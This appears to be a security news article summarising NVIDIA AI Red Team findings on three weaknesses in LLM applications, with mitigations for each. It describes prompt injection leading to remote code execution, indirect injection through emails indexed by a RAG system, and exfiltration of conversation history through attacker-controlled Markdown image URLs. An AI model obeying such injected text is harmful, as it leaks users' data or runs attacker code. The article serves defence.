NVIDIA Experts Detail Top 3 Security Flaws in AI Models

NVIDIA's specialized AI Red Team has identified three critical security vulnerabilities commonly found in applications using Large Language Models (LLMs). The team's findings highlight significant risks, including remote code execution, data leakage through retrieval-augmented generation (RAG) systems, and data theft via active content rendering.

By sharing these recurring issues, NVIDIA aims to provide developers with practical advice to secure AI-powered systems before they are deployed, addressing the most impactful threats observed across numerous internal assessments.

Key Takeaways

Remote Code Execution: Executing LLM-generated code without proper sandboxing is a primary vulnerability, often exploited through prompt injection to run malicious commands.
Insecure RAG Systems: Poorly configured permissions in Retrieval-Augmented Generation (RAG) data sources can lead to unauthorized access to sensitive information and create pathways for indirect prompt injection attacks.
Active Content Exploits: Rendering LLM outputs that contain active content like Markdown can be used by attackers to exfiltrate user data, such as conversation history, to external servers.

Vulnerability 1: Executing AI-Generated Code

One of the most severe security risks identified by the NVIDIA AI Red Team involves the direct execution of code produced by an LLM. Developers sometimes use functions like exec or eval to allow an AI model to perform tasks such as generating data plots or building SQL queries.

However, this practice creates a direct path for attackers. Using a technique called prompt injection, a malicious actor can trick the LLM into generating harmful code. If this code is then executed by the application without strict isolation, it can lead to remote code execution (RCE).

What is Remote Code Execution?

Remote Code Execution (RCE) allows an attacker to run arbitrary commands on a target machine over a network. In the context of LLMs, a successful RCE attack could give the intruder full control over the application's server and its data.

Attackers can be sophisticated, wrapping their malicious commands in layers of obfuscation to bypass simple security filters or guardrails. The final payload can be hidden within instructions that seem benign.

Mitigation Strategies

The most effective way to prevent this type of attack is to avoid using functions like exec and eval on LLM-generated content altogether. Instead, NVIDIA recommends a safer approach:

Design the application to interpret the LLM's intent rather than executing its raw output.
Map the interpreted intent to a predefined and limited set of safe, explicitly permitted functions.
If dynamic code execution is absolutely necessary, it must be performed within a secure and isolated sandbox environment, such as one based on WebAssembly, to contain any potential damage.

Vulnerability 2: Insecure Data Access in RAG Systems

Retrieval-Augmented Generation (RAG) is a popular architecture that allows LLMs to access external, up-to-date information without needing to be retrained. While powerful, RAG systems introduce their own set of security challenges, primarily related to data access controls.

How RAG Works

A RAG system first retrieves relevant documents or data from a knowledge base (like a company's internal wiki or document repository) based on a user's query. It then provides this information to the LLM as context to generate a more accurate and informed response.

The NVIDIA team found two major weaknesses in how RAG systems are often implemented.

Incorrect User Permissions

The first issue is the failure to correctly enforce user-specific permissions on the data retrieved. This can result in users accessing sensitive information they are not authorized to see. Common causes include:

Original data sources (like Google Workspace or Confluence) having misconfigured permissions.
The RAG data store failing to replicate the source's permission structure.
Delays in updating permissions, leaving data exposed temporarily.

This vulnerability can lead to significant data leakage, where a low-privilege user could trick the AI into revealing confidential corporate or personal data.

Broad Write Access and Indirect Injection

The second major RAG-related vulnerability is allowing broad write access to the data store that feeds the LLM. For instance, if a system indexes user emails to provide daily summaries, an attacker can exploit this.

An attacker could send a carefully crafted email containing a malicious prompt. When the RAG system indexes this email, the malicious prompt becomes part of the knowledge base. Later, when another user asks a related question, the system might retrieve the attacker's prompt, potentially leading to data exfiltration or other harmful actions. This is known as indirect prompt injection.

Mitigating this is complex because it often involves limiting the application's core functionality. NVIDIA suggests several layered defenses, such as allowing users to select trusted data sources, applying guardrails to check retrieved documents for malicious content, and establishing tightly controlled, authoritative datasets for sensitive topics.

Vulnerability 3: Data Theft Through Active Content

A third common vulnerability involves the application's user interface rendering active content, such as Markdown, generated by the LLM. Attackers can exploit this feature to steal sensitive data from users.

The attack works by using prompt injection to make the LLM include a specially crafted image link or hyperlink in its response. The URL in this link points to a server controlled by the attacker.

Crucially, the URL can also contain encoded data, such as the user's entire conversation history with the AI. When the user's browser automatically tries to load the image from the malicious URL, it sends the encoded data directly to the attacker's server logs.

How to Prevent Active Content Exploits

To counter this threat, NVIDIA's team recommends several defensive measures:

Use Content Security Policies (CSPs): Implement a strict CSP that only allows images and other resources to be loaded from a pre-approved list of trusted domains.
Make Links Transparent: For hyperlinks, always display the full destination URL to the user before they click. Alternatively, disable active links and require users to copy and paste them into their browser.
Sanitize LLM Output: Before displaying it to the user, strip all potentially active content like Markdown, HTML, and URLs from the LLM's response.
Disable Active Content: If other measures are not feasible, the most secure option is to completely disable the rendering of any active content in the user interface.

Conclusion: A Proactive Approach to AI Security

The findings from the NVIDIA AI Red Team underscore the importance of building security into LLM applications from the ground up. By anticipating and mitigating these three common vulnerabilities—uncontrolled code execution, insecure RAG data access, and active content rendering—developers can significantly reduce the risk of exploitation.

Adopting these practical security measures is essential for protecting user data and ensuring the safe and reliable deployment of AI-powered systems.

Key Takeaways

Remote Code Execution: Executing LLM-generated code without proper sandboxing is a primary vulnerability, often exploited through prompt injection to run malicious commands.
Insecure RAG Systems: Poorly configured permissions in Retrieval-Augmented Generation (RAG) data sources can lead to unauthorized access to sensitive information and create pathways for indirect prompt injection attacks.
Active Content Exploits: Rendering LLM outputs that contain active content like Markdown can be used by attackers to exfiltrate user data, such as conversation history, to external servers.

Vulnerability 1: Executing AI-Generated Code

What is Remote Code Execution?

Mitigation Strategies

The most effective way to prevent this type of attack is to avoid using functions like exec and eval on LLM-generated content altogether. Instead, NVIDIA recommends a safer approach:

Design the application to interpret the LLM's intent rather than executing its raw output.
Map the interpreted intent to a predefined and limited set of safe, explicitly permitted functions.
If dynamic code execution is absolutely necessary, it must be performed within a secure and isolated sandbox environment, such as one based on WebAssembly, to contain any potential damage.

Vulnerability 2: Insecure Data Access in RAG Systems

How RAG Works

The NVIDIA team found two major weaknesses in how RAG systems are often implemented.

Incorrect User Permissions

Original data sources (like Google Workspace or Confluence) having misconfigured permissions.
The RAG data store failing to replicate the source's permission structure.
Delays in updating permissions, leaving data exposed temporarily.

This vulnerability can lead to significant data leakage, where a low-privilege user could trick the AI into revealing confidential corporate or personal data.

Broad Write Access and Indirect Injection

An attacker could send a carefully crafted email containing a malicious prompt. When the RAG system indexes this email, the malicious prompt becomes part of the knowledge base. Later, when another user asks a related question, the system might retrieve the attacker's prompt, potentially leading to data exfiltration or other harmful actions. This is known as indirect prompt injection.

Vulnerability 3: Data Theft Through Active Content

The attack works by using prompt injection to make the LLM include a specially crafted image link or hyperlink in its response. The URL in this link points to a server controlled by the attacker.

How to Prevent Active Content Exploits

To counter this threat, NVIDIA's team recommends several defensive measures:

Use Content Security Policies (CSPs): Implement a strict CSP that only allows images and other resources to be loaded from a pre-approved list of trusted domains.
Make Links Transparent: For hyperlinks, always display the full destination URL to the user before they click. Alternatively, disable active links and require users to copy and paste them into their browser.
Sanitize LLM Output: Before displaying it to the user, strip all potentially active content like Markdown, HTML, and URLs from the LLM's response.
Disable Active Content: If other measures are not feasible, the most secure option is to completely disable the rendering of any active content in the user interface.

Conclusion: A Proactive Approach to AI Security

Adopting these practical security measures is essential for protecting user data and ensuring the safe and reliable deployment of AI-powered systems.

Key Takeaways

Vulnerability 1: Executing AI-Generated Code

What is Remote Code Execution?

Mitigation Strategies

Vulnerability 2: Insecure Data Access in RAG Systems

How RAG Works

Incorrect User Permissions

Broad Write Access and Indirect Injection

Vulnerability 3: Data Theft Through Active Content

How to Prevent Active Content Exploits

Conclusion: A Proactive Approach to AI Security

Related Articles

Why Websites Are Asking You to Prove You're Human

How Websites Track You: A Guide to Digital Cookies

Your Voicemail Greeting Is a Major Security Risk

AI-Powered Fake Receipts Create New Fraud Challenge

Key Takeaways

Vulnerability 1: Executing AI-Generated Code

What is Remote Code Execution?

Mitigation Strategies

Vulnerability 2: Insecure Data Access in RAG Systems

How RAG Works

Incorrect User Permissions

Broad Write Access and Indirect Injection

Vulnerability 3: Data Theft Through Active Content

How to Prevent Active Content Exploits

Conclusion: A Proactive Approach to AI Security